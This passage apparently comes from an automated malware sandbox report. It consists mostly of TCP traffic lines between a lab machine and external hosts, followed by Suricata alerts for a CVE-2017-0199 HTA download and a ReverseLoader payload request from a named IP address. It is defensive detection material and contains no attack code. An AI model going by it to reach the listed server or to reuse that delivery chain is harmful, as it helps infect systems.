          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49164
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 104.21.74.191:443
          Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49165
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 104.21.74.191:443
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 104.21.74.191:443
          Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49165
          Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49165
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 104.21.74.191:443
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 104.21.74.191:443
          Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49165
          Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49165
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 104.21.74.191:443
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 104.21.74.191:443
          Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49165
          Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49165
          Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49165
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 104.21.74.191:443
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 104.21.74.191:443
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 104.21.74.191:443
          Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49165
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49167
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49167
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49167
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49167
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49167
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49167
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49167
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49167
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49167
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49167
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49167
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49167
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 198.46.178.151:80
          Source: global trafficTCP traffic: 198.46.178.151:80 -> 192.168.2.22:49167

          Networking

          barindex
          Suricata IDS alerts for network traffic
          Source: Network trafficSuricata IDS: 2024197 - Severity 1 - ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199) : 198.46.178.151:80 -> 192.168.2.22:49164
          Source: Network trafficSuricata IDS: 2024197 - Severity 1 - ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199) : 198.46.178.151:80 -> 192.168.2.22:49166
          Source: Network trafficSuricata IDS: 2858795 - Severity 1 - ETPRO MALWARE ReverseLoader Payload Request (GET) M2 : 192.168.2.22:49167 -> 198.46.178.151:80
